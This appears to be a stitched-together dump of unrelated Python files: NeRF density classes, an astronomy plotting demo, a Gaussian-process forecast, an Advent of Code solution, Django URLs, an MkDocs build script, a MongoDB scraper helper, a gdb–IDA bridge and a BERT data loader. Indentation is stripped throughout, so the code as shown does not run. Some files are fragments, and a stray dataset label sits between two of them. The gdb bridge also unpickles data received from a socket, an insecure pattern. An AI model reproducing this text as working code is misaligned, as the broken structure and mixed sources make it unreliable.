self.beta_min = torch.tensor(beta_min).cuda()
def density_func(self, sdf, beta=None):
if beta is None:
beta = self.get_beta()
alpha = 1 / beta
return alpha * (0.5 + 0.5 * sdf.sign() * torch.expm1(-sdf.abs() / beta))
def get_beta(self):
beta = self.beta.abs() + self.beta_min
return beta
class AbsDensity(Density): # like NeRF++
def density_func(self, sdf, beta=None):
return torch.abs(sdf)
class SimpleDensity(Density): # like NeRF
def __init__(self, params_init={}, noise_std=1.0):
super().__init__(params_init=params_init)
self.noise_std = noise_std
def density_func(self, sdf, beta=None):
if self.training and self.noise_std > 0.0:
noise = torch.randn(sdf.shape).cuda() * self.noise_std
sdf = sdf + noise
return torch.relu(sdf)
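# A minimal usage sketch (not in the original file; a GPU is assumed because
# the classes above hard-code .cuda()):
#
#   density = LaplaceDensity(params_init={'beta': 0.1})
#   sdf = torch.randn(1024, 1).cuda()
#   sigma = density(sdf)  # alpha * Laplace(0, beta).cdf(-sdf), alpha = 1 / beta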
#!/usr/bin/env python3
import matplotlib.pylab as plt
import numpy as np
from astropy import units as u
from ctapipe.io import event_source
from ctapipe.utils import datasets
from ctapipe.visualization import ArrayDisplay
if __name__ == "__main__":
plt.figure(figsize=(9.5, 8.5))
# load up a single event, so we can get the subarray info:
source = event_source(
datasets.get_dataset_path("gamma_test_large.simtel.gz"), max_events=1,
)
event = next(iter(source))
# display the array
subarray = source.subarray
ad = ArrayDisplay(subarray, tel_scale=3.0)
print("Now setting vectors")
plt.pause(1.0)
plt.tight_layout()
for phi in np.linspace(0, 360, 30) * u.deg:
r = np.cos(phi / 2)
ad.set_vector_rho_phi(r, phi)
plt.pause(0.01)
ad.set_vector_rho_phi(0, 0 * u.deg)
plt.pause(1.0)
print("Now setting values")
ad.telescopes.set_linewidth(0)
for ii in range(50):
vals = np.random.uniform(100.0, size=subarray.num_tels)
ad.values = vals
plt.pause(0.01)
print("Setting labels")
for ii in range(3):
ad.add_labels()
plt.pause(0.5)
ad.remove_labels()
plt.pause(0.5)
lists = ['1', '2', '3']
print(lists[2])  # valid indices are 0..2; lists[3] would raise an IndexError
import torch
from torch.utils.data import DataLoader
import pytorch_lightning as pl
import scipy as sp
import numpy as np
import scipy.ndimage
from cyclic_gps.models import LEGFamily
from cyclic_gps.data_utils import time_series_dataset
import matplotlib.pyplot as plt
num_datapoints = 1000
DTYPE = torch.double
RANK = 5
MAX_EPOCHS = 800
OPTIMIZER = "ADAM" #or "ADAM" || "BFGS"
with open("../numpy_arrays/all_ts_2.npy", "rb") as f:
all_ts = np.load(f)
with open("../numpy_arrays/all_vals_2.npy", "rb") as f:
all_vals = np.load(f)
all_ts = torch.from_numpy(all_ts)
all_vals = torch.from_numpy(all_vals)
print(all_ts.shape)
print(all_vals.shape)
# create a torch dataset, and add a batch dim of zero
dataset = time_series_dataset(all_ts, all_vals)
example = dataset[0]
#print("example datatype: {}".format(example[0].dtype))
assert torch.allclose(example[0], all_ts.unsqueeze(0))
dl = DataLoader(dataset=dataset, batch_size=1)
leg_model = LEGFamily(rank=RANK, obs_dim=all_vals.shape[2], train=True, optimizer=OPTIMIZER, data_type=DTYPE)
leg_model.double()
trainer = pl.Trainer(max_epochs=MAX_EPOCHS)
trainer.fit(model=leg_model, train_dataloaders=dl)
#print(leg_model.G)
leg_model.register_model_matrices_from_params()
#print(leg_model.G)
PATH_TO_NPY = "../numpy_arrays/"
with open(PATH_TO_NPY + "sample3_ts_2.npy", "rb") as f:
sample3_ts = np.load(f)
with open(PATH_TO_NPY + "sample3_vals_2.npy", "rb") as f:
sample3_vals = np.load(f)
sample3_ts = torch.from_numpy(sample3_ts)
sample3_vals = torch.from_numpy(sample3_vals)
# sample3_ts_chopped = sample3_ts[:200]
# sample3_vals_chopped = sample3_vals[:200]
# forecast_times = sample3_ts[200:300]
sample3_ts_chopped = torch.cat([sample3_ts[:200], sample3_ts[-200:]], dim=0)
sample3_vals_chopped = torch.cat([sample3_vals[:200], sample3_vals[-200:]], dim=0)
print("sample_3 shapes: ts:{}, vals:{}".format(sample3_ts_chopped.shape, sample3_vals_chopped.shape))
with open(PATH_TO_NPY + "forecast_times_2.npy", "rb") as f:
forecast_times = np.load(f)
forecast_times = torch.from_numpy(forecast_times)
pred_means, pred_variances = leg_model.make_predictions(sample3_ts_chopped, sample3_vals_chopped, forecast_times)
#print("data type precision:{}".format(pred_means.dtype))
pred_means = pred_means.detach().numpy()
pred_variances = pred_variances.detach().numpy()
plt.scatter(sample3_ts_chopped, sample3_vals_chopped[:, 0], label='observed data')
plt.scatter(sample3_ts[200:-200], sample3_vals[200:-200][:, 0],label='censored data')
plt.plot(forecast_times, pred_means[:,0], 'C1', label='interpolation/forecasting')
plt.fill_between(forecast_times,
pred_means[:,0]+2*np.sqrt(pred_variances[:,0,0]),
pred_means[:,0]-2*np.sqrt(pred_variances[:,0,0]),
color='black',alpha=.5,label='Uncertainty')
plt.legend() #bbox_to_anchor=[1,1],fontsize=20
plt.show()
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
20a.py
~~~~~~
Advent of Code 2017 - Day 20: Particle Swarm
Part One
Suddenly, the GPU contacts you, asking for help. Someone has asked it to
simulate too many particles, and it won't be able to finish them all in
time to render the next frame at this rate.
It transmits to you a buffer (your puzzle input) listing each particle in
order (starting with particle 0, then particle 1, particle 2, and so on).
For each particle, it provides the X, Y, and Z coordinates for the
particle's position (p), velocity (v), and acceleration (a), each in the
format <X,Y,Z>.
Each tick, all particles are updated simultaneously. A particle's
properties are updated in the following order:
- Increase the X velocity by the X acceleration.
- Increase the Y velocity by the Y acceleration.
- Increase the Z velocity by the Z acceleration.
- Increase the X position by the X velocity.
- Increase the Y position by the Y velocity.
- Increase the Z position by the Z velocity.
Because of seemingly tenuous rationale involving z-buffering, the GPU would
like to know which particle will stay closest to position <0,0,0> in the
long term. Measure this using the Manhattan distance, which in this
situation is simply the sum of the absolute values of a particle's X, Y,
and Z position.
For example, suppose you are only given two particles, both of which stay
entirely on the X-axis (for simplicity). Drawing the current states of
particles 0 and 1 (in that order) with an adjacent a number line and
diagram of current X positions (marked in parenthesis), the following would
take place:
p=< 3,0,0>, v=< 2,0,0>, a=<-1,0,0> -4 -3 -2 -1 0 1 2 3 4
p=< 4,0,0>, v=< 0,0,0>, a=<-2,0,0> (0)(1)
p=< 4,0,0>, v=< 1,0,0>, a=<-1,0,0> -4 -3 -2 -1 0 1 2 3 4
p=< 2,0,0>, v=<-2,0,0>, a=<-2,0,0> (1) (0)
p=< 4,0,0>, v=< 0,0,0>, a=<-1,0,0> -4 -3 -2 -1 0 1 2 3 4
p=<-2,0,0>, v=<-4,0,0>, a=<-2,0,0> (1) (0)
p=< 3,0,0>, v=<-1,0,0>, a=<-1,0,0> -4 -3 -2 -1 0 1 2 3 4
p=<-8,0,0>, v=<-6,0,0>, a=<-2,0,0> (0)
At this point, particle 1 will never be closer to <0,0,0> than particle 0,
and so, in the long run, particle 0 will stay closest.
Which particle will stay closest to position <0,0,0> in the long term?
:copyright: (c) 2017 by Martin Bor.
:license: MIT, see LICENSE for more details.
"""
import sys
from vector import Vector
class Particle(object):
def __init__(self, i, p, v, a):
self.i = i
self.p = p
self.v = v
self.a = a
def __iter__(self):
return self
def __next__(self):
self.update()
return self
def ff(self, t):
"""Fast forward the position by t ticks"""
self.p = t**2 * self.a + t * self.v + self.p
def update(self):
"""Update positon according to acceleration and velocity vectors"""
self.v += self.a
self.p += self.v
def __abs__(self):
"""Return lenght of vector position"""
return abs(self.p)
def __repr__(self):
return f"id={self.i}, p={self.p}, v={self.v}, a={self.a}"
def solve(system):
"""Return ID of particle who stays the closest to <0,0,0> in the long term.
:system: particle initial system with position, velocity and acceleration
vectors
:returns: particle ID of the closest to <0,0,0> in the long term.
>>> solve('''p=<3,0,0>, v=<2,0,0>, a=<-1,0,0>
... p=<4,0,0>, v=<0,0,0>, a=<-2,0,0>''')
0
"""
particles = []
for i, line in enumerate(system.strip().split('\n')):
vectors = line.strip().split(', ')
p, v, a = (Vector(*map(int, v[3:-1].split(','))) for v in vectors)
particles.append(Particle(i, p, v, a))
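    # heuristic: after 10000 ticks the acceleration term dominates the position,
    # so the ordering by Manhattan distance has stabilised ("the long term")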
t = 10000
for p in particles:
p.ff(t)
return sorted(particles, key=abs)[0].i
def main(argv):
    if len(argv) == 2:
        f = open(argv[1], 'r')
    else:
        sys.stderr.write('reading from stdin...\n')
        f = sys.stdin
    print(solve(f.read()))
if __name__ == "__main__":
sys.exit(main(sys.argv))
expected_output = {
"cos-interface-information": {
"interface-map": {
"i-logical-map": {
"cos-objects": {
"cos-object-index": ["9", "13"],
"cos-object-name": [
"dscp-ipv6-compatibility",
"ipprec-compatibility",
],
"cos-object-subtype": ["dscp-ipv6", "ip"],
"cos-object-type": ["Classifier", "Classifier"],
},
"i-logical-index": "335",
"i-logical-name": "ge-0/0/2.0",
},
"interface-congestion-notification-map": "Disabled",
"interface-exclude-queue-overhead-bytes": "disabled",
"interface-index": "150",
"interface-logical-interface-aggregate-statistics": "disabled",
"interface-name": "ge-0/0/2",
"interface-queues-in-use": "4",
"interface-queues-supported": "8",
"interface-shaping-rate": "1000000",
"scheduler-map-index": "2",
"scheduler-map-name": "<default>",
}
}
}
from django.conf.urls import include, url
from django.urls import path
from django.contrib import admin
from django.views.generic import TemplateView
from rest_framework.permissions import IsAuthenticated
from elvanto_sync import views_api as va
from elvanto_sync import views_buttons as vb
from elvanto_sync.mixins import LoginRequiredMixin
from elvanto_sync.models import ElvantoGroup, ElvantoPerson
from elvanto_sync.serializers import (ElvantoGroupSerializer, ElvantoPersonSerializer)
admin.autodiscover()
class RestrictedTemplateView(LoginRequiredMixin, TemplateView):
pass
auth_patterns = [
url(r'^auth/', include('allauth.urls')),
]
urls_basic = [
path(r'admin/', admin.site.urls),
url(r'^$', RestrictedTemplateView.as_view(template_name='elvanto_sync/index.html'), name='index'),
url(
r'^group/(?P<pk>[0-9]+)$',
RestrictedTemplateView.as_view(template_name='elvanto_sync/index.html'),
name='group'
)
]
urls_buttons = [
url(r'^buttons/update_global/$', vb.UpdateGlobal.as_view(), name='button_update_global'),
url(r'^buttons/update_local/$', vb.UpdateLocal.as_view(), name='button_update_local'),
url(r'^buttons/update_sync/$', vb.UpdateSync.as_view(), name='button_update_sync'),
url(r'^buttons/push_all/$', vb.PushAll.as_view(), name='button_push_all'),
url(r'^buttons/pull_all/$', vb.PullAll.as_view(), name='button_pull_all'),
url(r'^buttons/push_group/$', vb.PushGroup.as_view(), name='button_push_group'),
]
urls_api = [
# api
url(
r'^api/v1/elvanto/groups/$',
va.ApiCollection.as_view(
model_class=ElvantoGroup, serializer_class=ElvantoGroupSerializer, permission_classes=(IsAuthenticated, )
),
name='api_groups'
),
url(
r'^api/v1/elvanto/groups/(?P<pk>[0-9]+)$',
va.ApiMember.as_view(
model_class=ElvantoGroup,
serializer_class=ElvantoGroupSerializer,
permission_classes=(IsAuthenticated, ),
),
name='api_group'
),
url(
r'^api/v1/elvanto/people/$',
va.ApiCollection.as_view(
model_class=ElvantoPerson, serializer_class=ElvantoPersonSerializer, permission_classes=(IsAuthenticated, )
),
name='api_people'
),
]
urlpatterns = auth_patterns + urls_buttons + urls_api + urls_basic
#!/usr/bin/env python2
# -*- coding: utf-8 -*- #
#
# Builds the GitHub Wiki documentation into a static HTML site.
#
# Copyright (c) 2015 carlosperate https://github.com/carlosperate/
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This script does the following to build the documentation:
# Pulls the latest changes from the GitHub Wiki repository
# Edits the MkDocs configuration file to include all the markdown files
# Creates an index.html file to have root redirected to a specific page
# Builds the static site using MkDocs
# REMOVES the root Documentation folder
# Copies the generate content into the root Documentation folder
#
from __future__ import unicode_literals, absolute_import
import os
import sys
import shutil
import subprocess
from tempfile import mkstemp
# mkdocs used only in the command line, imported just to ensure it's installed
try:
import mkdocs
except ImportError:
print("You need to have mkdocs installed !")
sys.exit(1)
# Path data
GITHUB_USER = "ngageoint"
WIKI_NAME = "scale.wiki"
GITHUB_WIKI_REPO = "github.com/%s/%s.git" % (GITHUB_USER, WIKI_NAME)
GIT_INIT_SCRIPT = 'setup_wiki_git.sh'
MKDOCS_FOLDER = "wiki"
THIS_FILE_DIR = os.path.dirname(os.path.realpath(__file__))
MKDOCS_DIR = os.path.join(THIS_FILE_DIR, MKDOCS_FOLDER)
WIKI_DIR = os.path.join(MKDOCS_DIR, WIKI_NAME)
GIT_INIT_FILE = os.path.join(WIKI_DIR, GIT_INIT_SCRIPT)
DEFAULT_INDEX = 'Home'
def pull_wiki_repo():
"""
Pulls latest changes from the wiki repo.
:return: Boolean indicating if the operation was successful.
"""
# Set working directory to the wiki repository
wiki_folder = os.path.join(MKDOCS_DIR, WIKI_NAME)
if os.path.isdir(wiki_folder):
os.chdir(wiki_folder)
else:
print("ERROR: Wiki repo directory is not correct: %s" % wiki_folder)
return False
# Init git in the wiki folder
subprocess.call(["sh", GIT_INIT_FILE])
# Ensure the submodule is initialised, progress is printed to stderr so just
# call subprocess with all data sent to console and error check later
subprocess.call(["git", "submodule", "update", "--init", "--recursive"])
# Ensure the subfolder selected is the correct repository
pipe = subprocess.PIPE
git_process = subprocess.Popen(
["git", "config", "--get", "remote.origin.url"],
stdout=pipe, stderr=pipe)
std_op, std_err_op = git_process.communicate()
if std_err_op:
print("ERROR: Could not get the remote information from the wiki "
"repository !\n%s" + std_err_op)
return False
if not GITHUB_WIKI_REPO in std_op:
print(("ERROR: Wiki repository:\n\t%s\n" % GITHUB_WIKI_REPO) +
"not found in directory %s url:\n\t%s\n" % (wiki_folder, std_op))
return False
    # Git fetch prints progress to stderr, so we cannot check for errors that way
print("\nPull from Wiki repository...")
subprocess.call(["git", "pull", "origin", "master"])
print("")
return True
def edit_mkdocs_config():
"""
Edits the mkdocs.yml MkDocs configuration file to include all markdown
files as part of the documentation.
These files are created by default with the '.md' extension and it is
assumed no other file extensions are to be linked.
:return: Boolean indicating the success of the operation.
"""
path_list = []
for file in os.listdir(os.path.join(MKDOCS_DIR, WIKI_NAME)):
if file.endswith(".md"):
path_list.append("- '%s': '%s'" %
(file, file[:-3].replace("-", " ")))
if not path_list:
print(("ERROR: No markdown files found in %s ! " % MKDOCS_DIR) +
"Check if repository has been set up correctly.")
return False
pages_str = "pages:\n" + "\n".join(path_list) + "\n"
# Replace the pages data, strategically located at the end of the file
mkdocs_yml = os.path.join(MKDOCS_DIR, "mkdocs.yml")
if not os.path.exists(mkdocs_yml):
print("ERROR: The MkDocs config file %s does not exist !" % mkdocs_yml)
return False
# Copy config file until the pages line, strategically located at the end
temp_file_handler, temp_abs_path = mkstemp()
with open(temp_abs_path, 'w') as temp_file:
with open(mkdocs_yml) as original_file:
for line in original_file:
if not "pages:" in line:
temp_file.write(line)
else:
print("Replacing 'pages' property found in mkdocs.yml ...")
break
else:
print("Did not find the 'pages' property in mkdocs.yml.\n" +
"Attaching the property at the end of the file.")
temp_file.write(pages_str)
print(pages_str)
# Remove original file and move the new temp to replace it
os.close(temp_file_handler)
try:
os.remove(mkdocs_yml)
except IOError:
print("ERROR: Could not delete original config file %s !" % mkdocs_yml)
return False
try:
shutil.move(temp_abs_path, mkdocs_yml)
except shutil.Error:
print("ERROR: Could move new config file to %s !" % mkdocs_yml)
return False
return True
def create_index():
"""
Creates an HTML index page to redirect to an MkDocs generated page.
:return: Boolean indicating the success of the operation.
"""
html_code = \
"<!DOCTYPE HTML>\n " \
"<html>\n" \
"\t<head>\n" \
"\t\t<meta charset=\"UTF-8\">\n" \
"\t\t<meta http-equiv=\"refresh\" content=\"1;url=%s/index.html\">\n" \
% DEFAULT_INDEX + \
"\t\t<script type=\"text/javascript\">\n" \
"\t\t\twindow.location.href = \"%s/index.html\"\n" % DEFAULT_INDEX +\
"\t\t</script>\n" \
"\t</head>\n" \
"\t<body>\n" \
"\t\tIf you are not redirected automatically to the " \
"%s page, follow this <a href=\"%s/index.html\">link</a>\n"\
% (DEFAULT_INDEX, DEFAULT_INDEX) + \
"\t</body>\n" \
"</html>\n"
print("Creating the index.html file...\n")
generated_site_dir = os.path.join(MKDOCS_DIR, "site")
if not os.path.exists(generated_site_dir):
try:
os.makedirs(generated_site_dir)
except IOError:
print("ERROR: Could not create site folder in %s !\n" %
generated_site_dir)
return False
try:
index_file = open(os.path.join(generated_site_dir, "index.html"), "w")
index_file.write(html_code)
index_file.close()
return True
except IOError:
print("ERROR: Could not create index.html file in %s !\n" %
generated_site_dir)
return False
def build_mkdocs():
"""
Invokes MkDocs to build the static documentation and moves the folder
into the project root folder.
:return: Boolean indicating the success of the operation.
"""
# Setting the working directory
if os.path.isdir(MKDOCS_DIR):
os.chdir(MKDOCS_DIR)
else:
print("ERROR: MkDocs directory is not correct: %s" % MKDOCS_DIR)
return False
# Building the MkDocs project
pipe = subprocess.PIPE
mkdocs_process = subprocess.Popen(
["mkdocs", "build"], stdout=pipe, stderr=pipe)
std_op, std_err_op = mkdocs_process.communicate()
if std_err_op:
print("ERROR: Could not build MkDocs !\n%s" %
std_err_op)
return False
else:
print(std_op)
# Remove root Documentation folder and copy the new site files into it
generated_site_dir = os.path.join(MKDOCS_DIR, "site")
root_documentation_dir = os.path.join(
os.path.dirname(THIS_FILE_DIR), "documentation")
print("Copy folder %s into %s ...\n" %
(generated_site_dir, root_documentation_dir))
if os.path.exists(root_documentation_dir):
try:
shutil.rmtree(root_documentation_dir)
except shutil.Error:
print("ERROR: Could not remove root documentation folder !")
return False
try:
shutil.move(generated_site_dir, root_documentation_dir)
except shutil.Error:
print("ERROR: Could move new documentation files from " +
"%s to %s !" % (generated_site_dir, root_documentation_dir))
return False
return True
def build_docs():
""" Builds the documentation HTML pages from the Wiki repository. """
success = pull_wiki_repo()
if success is False:
sys.exit(1)
success = edit_mkdocs_config()
if success is False:
sys.exit(1)
# Create index.html before the MkDocs site is created in case the project
# already contains an index file.
success = create_index()
if success is False:
sys.exit(1)
success = build_mkdocs()
if success is False:
sys.exit(1)
print("Build process finished!")
if __name__ == "__main__":
build_docs()
#---- Python VNF startup for ENCRYPT_2_to_1---
import SSL_listener
import SSL_writer
incomingIP="localhost"
incomingPort=10026
incomingPrivateKeyFile="server.key"
incomingPublicKeyFile="server.crt"
outgoingIP="localhost"
outgoingPort=10027
outgoingPublicKeyFile="server.crt"
def startENCRYPT_2_to_1():
ssl_writer=SSL_writer.SSL_writer(outgoingIP,outgoingPort, outgoingPublicKeyFile)
    incoming_ssl_EncryptionVNF = SSL_listener.SSL_listener(incomingIP, incomingPort, incomingPrivateKeyFile, incomingPublicKeyFile, ssl_writer)
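# Not in the original file: a minimal entry point (an assumption about intended
# use) so the VNF actually starts when the script is executed directly.
if __name__ == '__main__':
    startENCRYPT_2_to_1()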
from pymongo import MongoClient
class mongoRPSE:
mongos = ""
    # insert data
def insert_mongo_files(self,data):
mongoc = MongoClient("localhost:27017")
mongodb = mongoc.rpse
mongodb.empresas_file_process.insert_one(data)
def insert_mongo_score(self,data):
mongoc = MongoClient("localhost:27017")
mongodb = mongoc.rpse
mongodb.empresas_file_score.insert_one(data)
def inset_mongo_count(self,data):
mongoc = MongoClient("localhost:27017")
mongodb = mongoc.rpse
mongodb.empresas_conteo.insert_one(data)
def update_mongo_score(self,data):
mongoc = MongoClient("localhost:27017")
mongodb = mongoc.rpse
mongodb.empresas_file_process.update_one({"_id":data["_id"]},{'$set': data})
    # search for the newspaper (diario) referenced in an HTML page
def find_diario_in_html(self, html):
diarios = self.findAllDiario()
data = "<meta name=\"url\" content=\"https://"
if(data in str(html).lower()):
for diario in diarios:
print("filtro semana")
d = data+str(diario["url"])
if(d in str(html).lower()):
diarioActual = diario["nombre"].lower()
return diarioActual
data = "<meta property=\"og:url\" content=\"https://"
data1 = "<meta property=\"og:url\" content=\"http://"
if(data in str(html).lower() or data1 in str(html).lower()):
for diario in diarios:
d = data+str(diario["url"])
d1 = data1+str(diario["url"])
if(d in str(html).lower() or d1 in str(html).lower()):
diarioActual = diario["nombre"].lower()
return diarioActual
else:
for diario in diarios:
url = str(diario["url"])
if("www." in url):
url = str(diario["url"])[4:len(url)]
if(url in str(html).lower()):
diarioActual = diario["nombre"].lower()
return diarioActual
return ""
    # list data
def find_file_process(self, titulo, empresa):
mongoc = MongoClient("localhost:27017")
db = mongoc.rpse
files = db.empresas_file_process
query = {"empresa": empresa, "titulo": titulo}
data = files.find(query)
return data
def findAllDiario(self):
mongoc = MongoClient("localhost:27017")
db = mongoc.rpse
diarios = db.diarios
return diarios.find()
def find_diario(self, diario):
mongoc = MongoClient("localhost:27017")
db = mongoc.rpse
query = {"nombre": diario}
diario = db.diarios.find(query)
for d in diario:
return d
def findAllEmpresas(self):
mongoc = MongoClient("localhost:27017")
db = mongoc.rpse
empresas = db.empresas
return empresas.find()
    # filters to clean the data
def html_inicio(self, diario):
mongoc = MongoClient("localhost:27017")
db = mongoc.rpse
query = {"nombre": diario}
diario = db.diarios.find(query)
for d in diario:
return str(d["inicio"])
def html_fin(self, diario):
mongoc = MongoClient("localhost:27017")
db = mongoc.rpse
query = {"nombre": diario}
diario = db.diarios.find(query)
for d in diario:
return str(d["fin"])
def prueba(self):
self.mongos = "method prueba"
mongoc = MongoClient("localhost:27017")
db = mongoc.rpse
        # insert test newspapers
diarios=[
{"url": "www.eltiempo.com", "nombre": "eltiempo", "inicio":"<div class=\"articulo-contenido\" itemprop=\"articleBody\">", "fin": "<div class=\"articulo-enlaces\""},
{"url": "www.elespectador.com", "nombre":"espectador", "inicio": '<div class="node-body content_nota field field--name-body field--type-text-with-summary field--label-hidden', "fin": "</div>"},
{"url": "www.dinero.com", "nombre":"dinero", "inicio": "<div id=\"contentItem\">", "fin": "</div>"},
{"url": "www.semana.com", "nombre":"semana", "inicio": "<!-- Alliance -->", "fin": "</div>"},
{"url": "sostenibilidad.semana.com", "nombre":"sostenibilidad", "inicio": "<!-- Alliance -->", "fin": "</div>"},
{"url": "www.larepublica.co", "nombre":"larepublica", "inicio": "<div class=\"lead\">", "fin": "<p> </p>"},
{"url": "www.portafolio.co", "nombre":"portafolio", "inicio": "<div class=\"article-content\" itemprop=\"articleBody\"", "fin": "<div class=\"article-bottom-ads\""},
{"url": "gerente.com/co", "nombre":"gerente", "inicio": "<div class=\"article-content\">", "fin": "</div>"}]
for d in diarios:
db.diarios.insert_one(d)
        # insert information about the companies to search for
empresas = [
{'empresa': 'ECOPETROL', 'clave': ['ecopetrol', 'reficar']},
{'empresa': 'CANACOL ENERGY', 'clave': ['canacol', 'canacol energy']},
{'empresa': 'CEPSA', 'clave': ['cepsa', 'cepsa colombia']},
{'empresa': 'GENERAL', 'clave': ['fracking','gasoductos','petroleras']},
{'empresa': 'BPC', 'clave': ['british petroleum','british petroleum']}]
for d in empresas:
db.empresas.insert_one(d)
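# A minimal usage sketch (assumes a MongoDB instance on localhost:27017):
#
#   repo = mongoRPSE()
#   repo.prueba()  # seed the `diarios` and `empresas` collections
#   print(repo.html_inicio('semana'))  # -> "<!-- Alliance -->"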
from floodsystem import stationdata
from floodsystem import station
def run():
stations = stationdata.build_station_list()
List = station.inconsistent_typical_range_stations(stations)
print(List)
print(f"Number of inconsistent stations: {len(List)}")
if __name__ == '__main__':
    run()
# IME 2022 - LabProg II
#
# Script just testing plotting in python
# This is not working properly :p
import seaborn as sns
df = sns.load_dataset('iris')
# Usual boxplot
ax = sns.boxplot(x='species', y='sepal_length', data=df)
# Add jitter with the swarmplot function.
ax = sns.swarmplot(x='species', y='sepal_length', data=df, color="grey")
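# A likely reason the plot never appears is that the figure is never rendered;
# a minimal fix (an assumption about the intent) is to show it explicitly:
import matplotlib.pyplot as plt
plt.show()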
from . import mixins # noqa
from . import generic # noqa
from . import formview # noqa
from . import detail # noqa
from . import uimock # noqa
from __future__ import print_function
import gdb
import socket
import pickle
import os
import subprocess as sp
import sys
IDA_HOST = '10.113.208.101'
PORT = 56746
TMPDIR = '/tmp/iddaa'
def connect_ida():
if not os.path.exists(TMPDIR):
os.mkdir(TMPDIR)
try:
sock = socket.create_connection((IDA_HOST, PORT), timeout=3)
return sock
except socket.error as err:
sys.stderr.write("[ERROR] {}\n".format(err))
return None
def show_result(result):
try:
f = open('{}/result'.format(TMPDIR), 'w')
f.write(result)
f.close()
    except IOError as err:
        sys.stderr.write("[ERROR] {}\n".format(err))
return
gdb.execute('shell vim {}/result'.format(TMPDIR))
def send(sock, buf):
if sys.version_info < (3, 0):
sock.send(buf)
else:
sock.send(bytes(buf, 'UTF-8'))
def recv(sock, raw=False):
buf = bytes()
while True:
tmp = sock.recv(4096)
buf += tmp
if not tmp:
break
if raw:
return buf
else:
return buf if sys.version_info < (3, 0) else buf.decode()
def get_ida_symbols():
sock = connect_ida()
if not sock: return
send(sock, 'GETSYM')
buf = recv(sock, True)
with open('{}/symfile'.format(TMPDIR), 'wb') as f:
f.write(buf)
if os.path.exists('{}/symfile'.format(TMPDIR)):
gdb.execute('symbol-file {}/symfile'.format(TMPDIR))
else:
        print('Could not receive the IDA symfile.')
def get_pseudo_code(func):
sock = connect_ida()
if not sock: return
send(sock, 'GETPSEUDOCODE {}'.format(func))
code = recv(sock).strip()
if 'Function not found' in code:
print('[Error] ' + code)
return
show_result(code)
def get_local_type():
sock = connect_ida()
if not sock: return
send(sock, 'GETLOCALTYPE')
buf = recv(sock, True)
local_type = pickle.loads(buf)
with open('{}/localtype.h'.format(TMPDIR), 'wb') as f:
f.write(bytes(local_type['header'], 'UTF-8'))
with open('{}/localtype.cpp'.format(TMPDIR), 'wb') as f:
f.write(bytes(local_type['source'], 'UTF-8'))
cwd = os.getcwd()
os.chdir(TMPDIR)
if sp.check_call('g++ -c -g localtype.cpp'.split(' ')) == 0:
gdb.execute('add-symbol-file {}/localtype.o 0'.format(TMPDIR))
else:
print('Generate symbol file failed')
os.chdir(cwd)
def get_breakpoints():
sock = connect_ida()
if not sock: return
send(sock, 'GETBREAKPOINTS')
buf = recv(sock, True)
bps = pickle.loads(buf)
print(bps)
for bp in bps:
gdb.execute('break *{}'.format(bp))
class IDAPYTHON(gdb.Command):
""" IDA python script wrapper"""
def __init__(self):
super(IDAPYTHON, self).__init__('idapython', gdb.COMMAND_USER)
def invoke(self, args, from_tty):
if args == 'cheatsheet':
self.__cheatsheet()
return
sock = connect_ida()
if not sock: return
send(sock, 'EXECFILE')
buf = ''
try:
f = open(args, 'r')
buf = f.read()
except:
print('[ERROR] File not found.')
return
send(sock, buf)
show_result(recv(sock))
def __cheatsheet(self):
print('IDA python Cheat Sheet')
print()
print('idc MakeComm(addr, comment)')
print('----------------------------------------')
print('Add comment at specified address.')
print('Ex: idc MakeComm(0x804ddaa, \'Soy Sauce\')')
print()
print('idc SetColor(addr, what, color)')
print('----------------------------------------')
print('Set color for specified area')
print('Ex: idc SetColor(0x0804ddaa, 1, 0xaabbcc) // address only')
print(' idc SetColor(0x0804ddaa, 2, 0xaabbcc) // entire function')
print(' idc SetColor(0x0804ddaa, 3, 0xaabbcc) // entire segment')
print()
class IDARPC(gdb.Command):
""" IDA python command wrapper"""
def __init__(self, name):
super(IDARPC, self).__init__(name, gdb.COMMAND_USER)
self.name = name
def invoke(self, args, from_tty):
sock = connect_ida()
if not sock: return
send(sock, 'EXEC {}.{}'.format(self.name, args))
show_result(recv(sock))
IDAPYTHON()
IDARPC('idautils')
IDARPC('idaapi')
IDARPC('idc')
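# Example usage from the gdb prompt (assumes the IDA-side plugin is listening):
#   (gdb) idapython cheatsheet
#   (gdb) idc MakeComm(0x804ddaa, 'Soy Sauce')
#   (gdb) idautils Functions()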
| nilq/baby-python | python |
from tqdm import tqdm
from transformers import AutoTokenizer, AutoModelForSequenceClassification
from torch.utils.data import DataLoader, RandomSampler, SequentialSampler, TensorDataset
from torch.profiler import profile, record_function, ProfilerActivity, schedule
import torch
import torch.cuda as cutorch
import numpy as np
import pandas as pd
import asyncio
import os
os.environ['TOKENIZERS_PARALLELISM'] = "false"
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), "../../"))
from ecosys.utils.logger import Logger
from ecosys.utils.data_processor import processors, output_modes
from ecosys.utils.data_structure import HuggingFaceDataset
logger = Logger(__file__, "info", "w")
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
feature_size = 768
sequence_length = 128
task_name = 'CoLA'
batch_size = 32
base_dir = "/home/oai/share"
tokenizer = AutoTokenizer.from_pretrained(f"{base_dir}/HuggingFace/bert-base-uncased")
model_keys = [
"Distil",
"Base",
"Large",
]
model_paths = [
f"{base_dir}/HuggingFace/distilbert-base-uncased",
f"{base_dir}/HuggingFace/bert-base-uncased",
f"{base_dir}/HuggingFace/bert-large-uncased",
]
model_paths = dict(zip(model_keys, model_paths))
models = dict()
for key in model_keys:
logger.debug("key %s, path %s", key, model_paths[key])
models[key] = AutoModelForSequenceClassification.from_pretrained(model_paths[key]).to(device)
models[key].eval()
# ------------- Dataset Prepare --------------
processor = processors[task_name.lower()]()
output_mode = output_modes[task_name.lower()]
def fill_mask(sentence):
words = sentence.split()
rnd_idx = np.random.randint(0,len(words))
words[rnd_idx] = "[MASK]"
return ' '.join(words)
texts = processor.get_train_tsv(f'/data/GlueData/{task_name}/').reset_index()
texts["sentence"] = texts["sentence"].apply(fill_mask)
encoded_texts = tokenizer(
texts["sentence"].to_list(),
padding = 'max_length',
truncation = True,
max_length=sequence_length,
return_tensors = 'pt'
)
